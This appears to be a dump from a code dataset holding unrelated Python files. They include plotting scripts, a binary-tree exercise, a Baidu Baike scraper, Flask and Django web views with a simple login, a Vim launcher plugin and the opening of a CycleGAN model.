model.consts['quanta_gen_rate']\n movement_meth = model.movement_method\n df_plotting[(quanta, speed, temp, movement_meth)] = model.get_risk_at_time(time_to_get_results)\n\n df_plotting = df_plotting.melt(value_name='risk')\n df_plotting['movement_method'].fillna(value='No movement', inplace=True)\n flds = ['ambient temp.', 'wind speed']\n df_plotting[', '.join(flds)] = pd.Series(df_plotting.reindex(flds, axis='columns')\n .astype('str')\n .values.tolist()\n ).str.join(', ')\n sns.boxplot(x=', '.join(flds), y='risk', hue='movement_method', data=df_plotting)#, fliersize=0)\n ax.yaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n ax.set_xlabel('(ambient temp., wind speed)')\n ax.set_ylabel('Infection Risk')\n if save:\n save_loc = '/home/tdh17/Documents/BOX/NCS Project/models/stochastic_model/figures/'\n savepdf_tex(fig=fig, fig_loc=save_loc,\n name='people_movement')\n else:\n plt.show()\n plt.close()\n # mean_df = df_plotting.mean().reset_index(level=[0,2,3,4,5])\n # for i, (wind_d, temp, speed, quanta) in enumerate(itertools.product(mean_df['wind_direction'].unique(),\n # mean_df['ambient temp.'].unique(),\n # mean_df['wind speed'].unique(),\n # mean_df['quanta'].unique())):\n # wind_label = 'low' if speed == 5.0 else 'high'\n # temp_label = 'Winter' if temp == 5.0 else f'Autumn'\n # quanta_color= {5:'blue', 10:'red',25:'green'}\n # wind_ls = {5.0: '-', 15.0: '--'}\n # wind_dir_marker = {0.0: '*', 90.0: 'D'}\n # df = mean_df[(mean_df['wind speed'] == speed) & (mean_df['ambient temp.'] == temp) & (mean_df['quanta'] == quanta) & (mean_df['wind_direction'] == wind_d)].dropna()\n # baseline = df.loc[1.0,:]\n # ax1.plot(df[df['group'] == 'total'].index,\n # df[df['group'] == 'total'][0]/baseline[baseline['group']== 'total'][0].values[0] - 1,\n # color=quanta_color[quanta], ls=wind_ls[speed], marker=wind_dir_marker[wind_d],\n # label=f'{temp_label} - {wind_label} wind speed, quanta = {quanta}, wind_direction = {wind_d}')\n # ax2.plot(df[df['group'] == 'total'].index,\n # df[df['group'] == 'first room'][0],#/baseline[baseline['group']== 'first room'][0].values[0],\n # color=f'C{i}', label=f'{temp_label} - {wind_label} wind speed, quanta = {quanta}, wind_direction = {wind_d}')\n # # ax1.axhline(1, color='k', ls='--')\n # # # ax1.plot(box_plot_df.xs(key='total', level=1, axis=1).columns,\n # # # box_plot_df.xs(key='total', level=1, axis=1).quantile(q=0.95, axis=0), color=f'C{i}', ls='--')\n # # ax2.plot(box_plot_df.xs(key='first room', level=1, axis=1).columns,\n # # box_plot_df.xs(key='first room', level=1, axis=1).quantile(q=0.95, axis=0), color=f'C{i}', ls='--')\n # # ax1.boxplot(x=box_plot_df.xs(key='total', level=1, axis=1),\n # # positions=door_opening_fraction,\n # # manage_ticks=False, widths=0.03, whis=[0,100],\n # # boxprops=dict(color=f'C{i}',), whiskerprops=dict(color=f'C{i}',),\n # # capprops=dict(color=f'C{i}'), flierprops=dict(marker='x'),\n # # )\n # # ax2.boxplot(x=box_plot_df.xs(key='first room', level=1, axis=1),\n # # positions=door_opening_fraction,\n # # manage_ticks=False, widths=0.03, whis=[0,100],\n # # boxprops=dict(color=f'C{i}',), whiskerprops=dict(color=f'C{i}',),\n # # capprops=dict(color=f'C{i}'), flierprops=dict(marker='x'),\n # # )\n # # box_plot_df.boxplot()\n # # breakpoint()\n # # sns.boxplot(x=\"door open\", y=\"value\", hue='grouping', data=box_plot_df.melt(), ax=ax1)\n\n # for ax in [ax1, ax2]:\n # ax.legend(frameon=False)\n # ax.set_xlabel(r'Door open percentage')\n # ax.set_xlim([0,1])\n # # ax.set_ylim(bottom=0)\n # # ax.set_ylabel(r'Infection risk', labelpad=15)\n # ax.set_ylabel(r'\\$RR = IR/IR_{\\Gamma = 1} - 1\\$', labelpad=15)\n # ax.yaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n # ax.xaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n # ax.spines['bottom'].set_position(('data', 0))\n \n\n \n # for ax, axis in itertools.product([ax1,ax2],['bottom','left']):\n # ax.spines[axis].set_linewidth(2)\n # # ax.spines[axis].set_color('black')\n # for ax, axis in itertools.product([ax1,ax2],['top','right']):\n # ax.spines[axis].set_visible(False)\n \n\n\n\n # # ax3.set_xlabel('door opening fraction')\n # # ax3.set_xlim([0,1])\n\n # if save:\n # save_loc = '/home/tdh17/Documents/BOX/NCS Project/models/stochastic_model/figures/'\n # savepdf_tex(fig=fig1, fig_loc=save_loc,\n # name=f'winter_q_compare_door_analysis_full_{time_to_get_results.days}d_{str(wind_dir).replace(\".\",\"-\")}deg')\n \n # else:\n # plt.show()\n # plt.close()\n\n\n","sub_path":"plot_people_movement.py","file_name":"plot_people_movement.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633035534","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# --------------------------------------\n# DATE: 2018/2/28\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n :type sum: int\n \"\"\"\n\n def hasPathSum(self, root, sum):\n if root == None:\n return False\n if root.left == None and root.right == None:\n return root.val == sum\n return self.hasPathSum(root.left, sum - root.val) or self.hasPathSum(root.right, sum - root.val)\n\n\nif __name__ == \"__main__\":\n root = TreeNode(5)\n root.left, root.right = TreeNode(4), TreeNode(8)\n root.left.left, root.right.left, root.right.right = TreeNode(11), TreeNode(13), TreeNode(4)\n root.left.left.left, root.left.left.right, root.right.right.right = TreeNode(7), TreeNode(2), TreeNode(1)\n print(Solution().hasPathSum(root, 22))\n","sub_path":"binary_tree/solve_tree_problems_recursively/path_sum.py","file_name":"path_sum.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"166549661","text":"# -*- coding: utf-8 -*- \n# @Time : 2019/12/9 16:24\n# @Author : hangzhouwh \n# @Email: hangzhouwh@gmail.com\n# @File : baidu_artist.py \n# @Software: PyCharm\nimport re\nimport time\n\nimport scrapy\n\nfrom music163.items import BaikeArtistItem\nfrom music163.tool import json_tool\n\nartist_count = 0\nrequest_count = 0\n\n\nclass BaiduArtistSpider(scrapy.Spider):\n\tname = 'baidu_artist'\n\tallowed_domains = ['https://baike.baidu.com/']\n\n\tdef start_requests(self):\n\t\tglobal request_count\n\n\t\tcodes = [1001, 1002, 1003]\n\t\tfor code in codes:\n\t\t\tfile = 'D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\data\\\\artist\\\\artist_' + str(code) + '.json'\n\t\t\tartist_data = json_tool.load_json(file)\n\n\t\t\tfor artist in artist_data:\n\t\t\t\trequest_count += 1\n\t\t\t\tprint(\"发送Request: \", request_count)\n\t\t\t\t# if request_count % 1000 == 0:\n\t\t\t\t# \ttime.sleep(5)\n\n\t\t\t\tartist_id = artist['artist_id']\n\t\t\t\tartist_name = artist['artist_name']\n\t\t\t\turl = 'https://baike.baidu.com/item/' + str(artist_name)\n\t\t\t\tyield scrapy.Request(url=url, meta={'artist_id': artist_id, 'artist_name':artist_name}, dont_filter=True)\n\n\tdef parse(self, response):\n\t\tbaike_artist_item = BaikeArtistItem()\n\n\t\tartist_id = response.meta['artist_id']\n\t\tartist_name = response.meta['artist_name']\n\t\t# artist_name # 中文名\n\t\t# nationality # 国籍\n\t\t# nation # 民族\n\t\t# occupation # 职业\n\t\t# birthday # 出生日期\n\t\t# IBEC # 经济公司\n\t\t# is_changed_name # 是否改过名(有原名)\n\t\t# university # 毕业院校\n\n\t\tattr_name = response.xpath('//dt[@class=\"basicInfo-item name\"]//text()').extract() # 属性名称\n\t\tattr_value_selector = response.xpath('//dd[@class=\"basicInfo-item value\"]') # 属性值选择器\n\t\tattr_value = attr_value_selector.xpath('string(.)').extract() # 属性值\n\n\t\tattr_name_list = []\n\t\tattr_value_list = []\n\n\t\tpattern = r'^\\[\\d{1,2}]$'\n\n\t\tfor i in range(len(attr_name)):\n\t\t\tattr_name[i] = attr_name[i].replace(\"\\xa0\", \"\")\n\n\t\t\t# 删除重复项\n\t\t\tif '展开' in attr_value[i] and '收起' in attr_value[i]:\n\t\t\t\tattr_value[i] = 'null'\n\n\t\t\tcut_txt = attr_value[i].replace(\"\\xa0\", \"\")\n\t\t\ttxt_list = re.split(\"、|\\n\", cut_txt)\n\n\t\t\tfor j in range(len(txt_list)):\n\t\t\t\tif '' in txt_list:\n\t\t\t\t\ttxt_list.remove('')\n\t\t\t\tif '展开' in txt_list:\n\t\t\t\t\ttxt_list.remove('展开')\n\t\t\t\tif '收起' in txt_list:\n\t\t\t\t\ttxt_list.remove('收起')\n\t\t\t\tfor txt in txt_list:\n\t\t\t\t\tif re.match(pattern, txt):\n\t\t\t\t\t\ttxt_list.remove(txt)\n\n\t\t\tif attr_value[i] != 'null':\n\t\t\t\tattr_name_list.append(attr_name[i])\n\t\t\t\tattr_value_list.append(txt_list)\n\n\t\tbaike_artist_item['artist_id'] = artist_id\n\t\tbaike_artist_item['artist_name'] = artist_name\n\t\tbaike_artist_item['attr_name'] = attr_name_list\n\t\tbaike_artist_item['attr_value'] = attr_value_list\n\n\t\tglobal artist_count\n\t\tartist_count = artist_count + 1\n\t\tprint(\"爬取歌手百科信息: \", artist_count)\n\n\t\tyield baike_artist_item\n","sub_path":"music163/spiders/baidu_artist.py","file_name":"baidu_artist.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271114841","text":"def findLoop(arr):\n checked = []\n i = 0\n acc = 0\n while i not in checked:\n checked.append(i)\n if arr[i][0] == 'nop':\n i+=1\n continue\n if arr[i][0] == 'acc':\n acc += int(arr[i][1])\n i+=1\n continue\n if arr[i][0] == 'jmp':\n i += int(arr[i][1])\n continue\n return acc\n\n#===============================================================================\ninputFile = open(\"input.txt\", 'r')\narr = []\nfor line in inputFile:\n line = line.split()\n arr.append(line)\ninputFile.close()\n\nprint(findLoop(arr))\n","sub_path":"day8/day8.1.py","file_name":"day8.1.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162534945","text":"import adaboost\nimport matplotlib.pyplot as plt\ndataMat,classLabels=adaboost.loadSimpData()\n\nxcord0=[]\nycord0=[]\nxcord1=[]\nycord1=[]\n\nfor i in range(len(classLabels)):\n if classLabels[i]==-1:\n xcord0.append(dataMat[i,0])\n ycord0.append(dataMat[i,1])\n elif classLabels[i]==1:\n xcord1.append(dataMat[i,0])\n ycord1.append(dataMat[i,1])\n\nplt.figure()\nplt.xlim(0.8,2.2)\nplt.ylim(0.8,2.2)\nplt.scatter(xcord0,ycord0,marker='s')\nplt.scatter(xcord1,ycord1,marker='o')\n\nplt.show()\n","sub_path":"AdaBoost/adaplot.py","file_name":"adaplot.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"141766410","text":"#coding:utf8\nfrom . import home\nfrom flask import render_template, session, request\nfrom app.models import Adminuser, Article, CaesarCipher, Category, DataStructure, Quotation, db\nfrom app.common.redis import get_article,get_algorithm_detail, get_quotation, get_index\nfrom sqlalchemy import func, or_, not_\nfrom app.selfFunction import is_int\nimport redis\n\n\n@home.route(\"/\")\ndef index():\n res = get_index()\n if not res:\n return render_template('home/none.html', res=res)\n return render_template('home/index.html', res=res, h1='很巧,你就这样来了', h3='', style='header-six')\n\n\n@home.route(\"/Category/\")\ndef category(id):\n res = Article.query.filter(Article.type == id, Article.status == 1).all()\n num = 1\n for i in res:\n i.num = num\n i.second = '0.' + str(num)\n if 8 == num:\n num = 1\n else:\n num += 1\n if not res:\n return render_template('home/none.html', res=res)\n return render_template('home/index.html', res=res, h1='假如有人问我的烦恼', h3='我不敢说出你的名字', style='header-five')\n\n\n@home.route(\"/Article/\")\ndef article(id):\n if 0 == is_int(id):\n return render_template('common/404.html')\n res = get_article(id)\n if not res:\n return render_template('common/404.html')\n return render_template('home/article.html', res=res)\n\n\n@home.route(\"/Algorithm\")\ndef Algorithm():\n res = DataStructure.query.with_entities(DataStructure.difficulty, DataStructure.id, DataStructure.title, Category.name, Category.id.label('categoryId'))\\\n .join(Category, DataStructure.language == Category.id).all()\n data = CaesarCipher.query.filter(CaesarCipher.status == 1).order_by(func.rand()).first()\n # count = db.session.query(DataStructure.difficulty, func.count('*').label(\"user_count\"))\\\n # .group_by(DataStructure.difficulty).all()\n # sumArg = 0\n # percent = []\n # if len(count)!=0:\n # for i in count:\n # sumArg += i[1]\n # # print(i)\n # for i in count:\n # single = ()\n # # print(round(i[1]/sumArg, 3))\n # single = (i[0], str(round(i[1]/sumArg, 3)*100)+'%')\n # percent.append(single)\n # return render_template('home/algorithm.html', res=res, sum=sumArg, percent=percent)\n\n return render_template('home/algorithm.html', res=res, data=data)\n\n\n@home.route(\"/AlgorithmCategory/\")\ndef AlgorithmCategory(id):\n res = DataStructure.query.with_entities(DataStructure.difficulty, DataStructure.id, DataStructure.title, Category.name, Category.id.label('categoryId'))\\\n .join(Category, DataStructure.language == Category.id).filter(DataStructure.language == id).all()\n data = CaesarCipher.query.filter(CaesarCipher.status == 1).order_by(func.rand()).first()\n\n # count = db.session.query(DataStructure.difficulty, func.count('*').label(\"user_count\")).group_by(\n # DataStructure.difficulty).all()\n # sumArg = 0\n # percent = []\n # if len(count) != 0:\n # for i in count:\n # sumArg += i[1]\n\n return render_template('home/algorithm.html', res=res, data=data)\n\n\n@home.route(\"/AlgorithmDetail/\")\ndef AlgorithmDetail(id):\n if 0 == is_int(id):\n return render_template('common/404.html')\n # res = DataStructure.query\\\n # .with_entities(DataStructure.id, DataStructure.title, DataStructure.answer, DataStructure.question, DataStructure.difficulty, Category.name)\\\n # .join(Category, DataStructure.language == Category.id).filter(DataStructure.id == id).first()\n res = get_algorithm_detail(id)\n if not res:\n return render_template('common/404.html')\n return render_template('home/algorithmDetail.html', res=res)\n\n\n@home.route(\"/quotation\")\ndef quotationIndex():\n res = get_quotation(0)\n # res = Quotation.query.filter(Quotation.status == 1).all()\n return render_template('home/quotation.html',res=res)\n\n\n@home.app_errorhandler(404)\ndef miss(e):\n return render_template('common/404.html'),404\n\n\n@home.app_errorhandler(500)\ndef error(e):\n return render_template('common/404.html'),500\n","sub_path":"app/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34220005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nozzy.launcher\n~~~~~~~~~~~~~\n\nThis module defines the class that implements the launcher.\n\"\"\"\n\nfrom __future__ import division\n\nimport os\nimport re\nimport vim\nfrom math import *\n\nimport ozzy.input\nimport ozzy.utils.misc\nimport ozzy.utils.settings\n\n\nclass Launcher:\n\n def __init__(self, plug, data_layer):\n self.settings = ozzy.utils.settings\n self.misc = ozzy.utils.misc\n\n self.plug = plug\n self.data = data_layer\n self.name = 'ozzy.launcher'\n self.prompt = self.settings.get('prompt')\n self.input_so_far = ''\n self.launcher_win = None\n self.curr_pos = None\n self.curr_entries_number = 0\n self.curr_file = None\n self.curr_win = None\n self.mapper = {}\n self.orig_settings = {}\n self.max_entries = self.settings.get('max_entries', int)\n self.RE_MATH = re.compile('(\\d+|\\+|\\*|\\/|-)')\n\n # setup highlight groups\n self.setup_colors()\n\n def setup_colors(self):\n \"\"\"Setups highlight groups according to the current settings.\"\"\"\n\n paths = self.settings.get(\"paths_color\")\n matches = self.settings.get(\"matches_color\")\n dirs = self.settings.get(\"last_dir_color\")\n\n if vim.eval(\"&background\") == 'dark':\n p = self.settings.get(\"paths_color_darkbg\")\n path = p if p else paths\n m = self.settings.get(\"matches_color_darkbg\")\n matches = m if m else matches\n d = self.settings.get(\"last_dir_color_darkbg\")\n dirs = d if d else dirs\n\n for g, c in ((\"Paths\", paths), (\"Matches\", matches), (\"Dirs\", dirs)):\n if \"=\" not in c:\n # a group is found\n vim.command(\"hi link Ozzy{0} {1}\".format(g, c))\n else:\n vim.command(\"hi Ozzy{0} {1}\".format(g, c))\n\n def restore_old_settings(self):\n \"\"\"Restore original settings.\"\"\"\n specials = (\"@/\",)\n for sett, val in self.orig_settings.items():\n if sett in specials:\n vim.command(\"\"\"let {}=\"{}\" \"\"\".format(\n sett, val.replace('\"', '\\\\\"')))\n else:\n vim.command('set {0}={1}'.format(sett, val))\n\n def reset_launcher(self):\n self.input_so_far = ''\n self.launcher_win = None\n self.curr_pos = None\n self.curr_entries_number = 0\n self.curr_file = None\n self.mapper = {}\n\n def setup_buffer(self):\n \"\"\"To setup buffer properties of the matches list window.\"\"\"\n vim.command(\"setlocal buftype=nofile\")\n vim.command(\"setlocal bufhidden=wipe\")\n vim.command(\"setlocal encoding=utf-8\")\n vim.command(\"setlocal nobuflisted\")\n vim.command(\"setlocal noundofile\")\n vim.command(\"setlocal nobackup\")\n vim.command(\"setlocal noswapfile\")\n vim.command(\"setlocal nowrap\")\n vim.command(\"setlocal nonumber\")\n vim.command(\"setlocal cursorline\")\n vim.command(\"setlocal nolist\")\n vim.command(\"setlocal nospell\")\n vim.command(\"setlocal textwidth=0\")\n vim.command('setlocal colorcolumn=0')\n vim.command(\"try|setlocal norelativenumber|catch|endtry\")\n self.orig_settings['@/'] = vim.eval('@/')\n vim.command('let @/ = \"\"')\n self.orig_settings['laststatus'] = vim.eval('&laststatus')\n vim.command('setlocal laststatus=0')\n self.orig_settings['guicursor'] = vim.eval('&guicursor')\n vim.command(\"setlocal guicursor=a:hor5-Cursor-blinkwait100\")\n\n def highlight(self, max_len, input):\n vim.command(\"syntax clear\")\n vim.command('syn match OzzyPaths /\\%>{0}c./'.format(max_len + 3))\n if input:\n vim.command(\"syn match OzzyMatches /\\%<{0}v\\c{1}/\".format(\n max_len + 2, input.encode('utf-8', 'ignore')))\n\n def close_launcher(self):\n \"\"\"To close the matches list window.\"\"\"\n self.misc.go_to_win(self.launcher_win)\n self.reset_launcher()\n self.restore_old_settings()\n vim.command('q')\n if self.curr_win:\n self.misc.go_to_win(self.curr_win)\n\n def open_launcher(self):\n \"\"\"To open the matches list window.\"\"\"\n vim.command('silent! botright split {0}'.format(self.name))\n self.setup_buffer()\n return vim.eval(\"bufwinnr('{0}')\".format(self.name))\n\n def update_launcher(self):\n \"\"\"To update the matches list content.\"\"\"\n if not self.launcher_win:\n self.launcher_win = self.open_launcher()\n\n self.misc.go_to_win(self.launcher_win)\n self.misc.set_buffer(None)\n\n if self.is_arithmetic_expr(self.input_so_far):\n\n result = self.eval_arithmetic_expr(self.input_so_far)\n\n if result:\n res = ' = {0}'.format(result)\n else:\n res = ' = ...'\n\n vim.command('syntax clear')\n self.misc.set_buffer([res])\n vim.current.window.height = 1\n self.curr_pos = 0\n\n else:\n\n scoreboard = self.data.make_scoreboard(\n self.input_so_far, exclude=self.curr_file)\n data = [path for score, path in sorted(scoreboard, reverse=True)]\n\n if data:\n\n data = data[-self.max_entries:]\n m = max(len(os.path.basename(path)) for path in data)\n self.mapper = dict(enumerate(data))\n self.misc.set_buffer([self.format_record(p, m) for p in data])\n vim.current.window.height = len(data)\n self.highlight(m, self.input_so_far)\n self.format_curr_line(m)\n\n else:\n\n vim.command('syntax clear')\n self.misc.set_buffer([' nothing found...'])\n vim.current.window.height = 1\n self.curr_pos = 0\n\n if self.curr_pos is not None:\n vim.current.window.cursor = (self.curr_pos + 1, 1)\n self.curr_entries_number = vim.current.window.height\n\n vim.command(\"normal! 0\")\n\n def is_arithmetic_expr(self, expr):\n \"\"\"To detect an arithmetic expression (very naive).\"\"\"\n if self.RE_MATH.search(expr):\n return True\n\n def eval_arithmetic_expr(self, expr):\n \"\"\"To evaluate an arithmetic expression.\"\"\"\n try:\n return eval(expr)\n except:\n return None\n\n def format_record(self, path, max_len):\n \"\"\"To format a match displayed in the matches list window.\"\"\"\n path = path.encode('utf-8')\n path = path.replace(os.path.realpath(os.path.expanduser('~')), '~')\n\n if self.settings.get(\"show_file_names\", bool):\n full_path = path\n else:\n full_path = os.path.dirname(path)\n\n return ' {0: <{1}}{2}'.format(\n os.path.basename(path), max_len + 4, full_path)\n\n def format_curr_line(self, max_len):\n \"\"\"To format the current line in the laucher window.\"\"\"\n if self.curr_pos is None:\n self.curr_pos = len(vim.current.buffer) - 1\n line = vim.current.buffer[self.curr_pos]\n vim.current.buffer[self.curr_pos] = '▸ ' + line[2:]\n\n def open_selected_file(self):\n \"\"\"To open the file on the selected line.\"\"\"\n path = self.mapper.get(self.curr_pos)\n self.close_launcher()\n vim.command('sil! e {0}'.format(self.misc.escape_spaces(path)))\n\n def delete_selected_file(self):\n \"\"\"To delete the selected file from the database.\"\"\"\n path = self.mapper.get(self.curr_pos)\n if path.startswith('~'):\n path = os.path.join(os.path.expanduser('~'), path[2:])\n\n self.data.delete_file(path)\n\n def open(self):\n \"\"\"To open the launcher.\"\"\"\n # Remember the currently open file so that we can exclude it\n # from the matches\n self.curr_file = vim.current.buffer.name\n self.curr_win = self.misc.winnr()\n\n # This first call opens the list of matches even though the user\n # didn't give any character as input\n self.update_launcher()\n self.misc.redraw()\n\n input = ozzy.input.Input()\n # Start the input loop\n while True:\n\n if self.plug.mode:\n mode = self.settings.get('project_mode_flag')\n else:\n mode = self.settings.get('global_mode_flag')\n\n # Display the prompt and the text the user has been typed so far\n prompt = \"\"\"{0}{1}{2}\"\"\".format(\n mode, self.prompt, self.input_so_far.encode('utf-8'))\n prompt = prompt.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n vim.command(\"echo \\\"{0}\\\"\".format(prompt))\n\n # Get the next character\n input.get()\n\n if (input.RETURN or input.CTRL and input.CHAR == 'o'\n or input.CTRL and input.CHAR == 'e'):\n # The user have chosen the currently selected match\n self.open_selected_file()\n self.data.cache = []\n break\n\n elif input.BS:\n # This acts just like the normal backspace key\n self.input_so_far = u\"{0}\".format(self.input_so_far)[:-1]\n # Reset the position of the selection in the matches list\n # because the list has to be rebuilt\n self.curr_pos = None\n self.data.cache = []\n\n elif input.ESC or input.INTERRUPT:\n # The user want to close the launcher\n self.close_launcher()\n self.data.cache = []\n self.misc.redraw()\n break\n\n elif input.UP or input.TAB or input.CTRL and input.CHAR == 'k':\n # Move up in the matches list\n last_index = len(vim.current.buffer) - 1\n if self.curr_pos == 0:\n self.curr_pos = last_index\n else:\n self.curr_pos -= 1\n\n elif input.DOWN or input.CTRL and input.CHAR == 'j':\n # Move down in the matches list\n last_index = len(vim.current.buffer) - 1\n if self.curr_pos == last_index:\n self.curr_pos = 0\n else:\n self.curr_pos += 1\n\n elif input.CTRL and input.CHAR == 'd':\n self.delete_selected_file()\n self.curr_pos = None\n self.data.cache = []\n\n elif input.CTRL and input.CHAR == 'u':\n # clear the current search\n self.input_so_far = ''\n self.curr_pos = None\n self.data.cache = []\n\n elif input.CHAR:\n # A printable character has been pressed. We have to remember\n # it so that in the next loop we can display exactly what the\n # user has been typed so far\n self.input_so_far += input.CHAR.decode('utf-8')\n\n # Reset the position of the selection in the matches list\n # because the list has to be rebuilt\n self.curr_pos = None\n\n else:\n self.misc.redraw()\n continue\n\n self.update_launcher()\n\n # Clean the command line\n self.misc.redraw()\n","sub_path":"ozzy-3.3/plugin/ozzy/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":11311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"498039683","text":"code_solution=[\"UTF-8\",\"cp1254\",\"latin-1\",\"ASCII\"]\r\n\r\ncharacter=input(\"Enter a character: \")\r\n\r\nfor x in code_solution:\r\n\ttry:\r\n\t\tprint(\"'{}'' represent with {}, be {} and {} number\".format(character,x,character.encode(x),ord(character)))\r\n\r\n\texcept UnicodeEncodeError:\r\n\t\tprint(\"'{}' can't represent with {}!\".format(character,x))","sub_path":"en-US_chr_enc.py","file_name":"en-US_chr_enc.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520263093","text":"# encoding=utf-8\nimport hashlib\nimport time\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.urls import reverse\n\nfrom APP_BasicInfo.models import InfoStudent, InfoTeacher, InfoAdmin\n# from Cyl_FaceRecognition import LOGIN_FLAG\n# from Middlewares import login_flag\nfrom Other_Code.view_utils import view_utils as utils\nfrom Other_Code.view_utils.view_utils import try_log\n\n\ndef return_anew(request, uname='', upad='', ucod=''):\n \"\"\"\n GET提交时执行 生成验证码并返回登陆页面\n :param request:\n :param uname:\n :param upad:\n :param ucod:\n :return:\n \"\"\"\n data = {\n 'uname': uname,\n 'upad': upad,\n 'ucod': ucod,\n }\n name = utils.createCode() # 画二维码\n request.session['yzmname'] = name\n print(name)\n return render(request, 'login.html', context=data)\n\n\ndef create_token(request, username, radio):\n \"\"\"\n 创建token 使用ip和用户名和使时间构成唯一的令牌\n :param request:\n :param username:\n :param radio:\n :return:\n \"\"\"\n ip = request.META.get(\"REMOTE_ADDR\")\n c_time = time.ctime()\n\n r = username\n\n return radio + hashlib.new(\"md5\", (ip + c_time + r).encode(\"utf-8\")).hexdigest()\n\n\ndef login(request):\n uname = ''\n unum = ''\n img_path = ''\n inf = ''\n yzm = 0\n data ={}\n request.session['viflag'] = '1' # 是否开局拦截\n if request.method == 'GET':\n return return_anew(request)\n elif request.method == 'POST':\n yzmname = request.session.get('yzmname')\n da = request.POST\n uco = da.get('usercode').lower()\n try:\n yzm = yzmname.lower()\n except Exception as e:\n yzm = '0'\n if uco != yzm:\n return return_anew(request, ucod='验证码错误')\n elif uco == yzm:\n username = da.get('username')\n userpasswd = da.get('userpassword')\n radio = da.get('radio')\n db_login = ''\n if radio == 'radio1':\n db_login = InfoStudent.objects.filter(st_login_id=username).filter(st_passwd=userpasswd)\n elif radio == 'radio2':\n db_login = InfoTeacher.objects.filter(te_login_id=username).filter(te_passwd=userpasswd)\n elif radio == 'radio3':\n db_login = InfoAdmin.objects.filter(admin_number=username).filter(admin_passwd=userpasswd)\n if db_login.exists():\n token = create_token(request, username, radio)\n db_login = db_login.first()\n if radio == 'radio1':\n db_login.st_token = token\n db_login.save()\n uname = db_login.st_name\n unum = db_login.st_id\n img_path = db_login.st_pic_path\n inf = 'student'\n elif radio == 'radio2':\n db_login.te_token = token\n db_login.save()\n uname = db_login.te_name\n unum = db_login.te_id\n img_path = db_login.te_pic_path\n inf = 'teacher'\n elif radio == 'radio3':\n db_login.admin_token = token\n db_login.save()\n uname = db_login.admin_number\n unum = uname\n img_path = db_login.admin_pic_path\n inf = 'admin'\n response = redirect(reverse('app_login:welcome'))\n response.set_cookie('token', token)\n request.session['data'] = data\n request.session['inf'] = inf\n return response\n else:\n return return_anew(request, upad='账号或密码错误')\n\ndef gowelcome(request): # 0 不刷新\n data = request.session['data']\n data['nav_path']['nav_path_one'] = '主页'\n return render(request, 'welcome.html', context=data)\n\ndef welcome(request):\n inf = ''\n try:\n inf = request.session['inf']\n except Exception as e:\n try_log()\n data = request.session['data']\n data['nav_path']['nav_path_one'] = '主页'\n if inf == 'teacher':\n return render(request, 'teacher_welcome.html', context=data)\n elif inf == 'student':\n return render(request, 'student_welcome.html', context=data)\n elif inf == 'admin':\n return render(request, 'admin_welcome.html', context=data)\n # return gowelcome(request)\n\n # data = request.session['data']\n # data['nav_path']['nav_path_one'] = '主页'\n # return render(request, 'welcome.html', context=data)\n\n\n\ndef loginout(request):\n\n token = request.COOKIES.get('token')\n iden = str(token)[5:6]\n db = 0\n try:\n if iden == '1':\n db = InfoStudent.objects.get(st_token=token)\n db.st_token = ' '\n elif iden == '2':\n db = InfoTeacher.objects.get(te_token=token)\n db.te_token = ' '\n elif iden == '3':\n db = InfoAdmin.objects.get(admin_token=token)\n db.admin_token = ' '\n\n db.save()\n except Exception as e:\n pass\n request.session.flush()\n response = redirect(reverse('app_login:login'))\n response.delete_cookie('token')\n return response\n\n\ndef skip_welcome(request):\n\n return gowelcome(request)","sub_path":"3.人工智能/基于深度学习的人脸识别系统/Cyl_FaceRecognition/APP_Login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"313033707","text":"import sys\nimport torch\nimport itertools\nfrom util.image_pool import ImagePool\nfrom util.losses import L1_Charbonnier_loss\nfrom .base_model import BaseModel\nfrom . import networks\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nfrom models.vgg_perceptual_loss import VGGPerceptualLoss\n#import kornia.augmentation\n#import sys\n\nimport random\nimport math\nfrom torch import distributed as dist\n\nfrom .modules import loss\n\nfrom util.util import gaussian\n\nclass CycleGANSemanticMaskSty2Model(BaseModel):\n #def name(self):\n # return 'CycleGANModel'\n\n # new, copied from cyclegansemantic model\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n\n For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.\n A (source 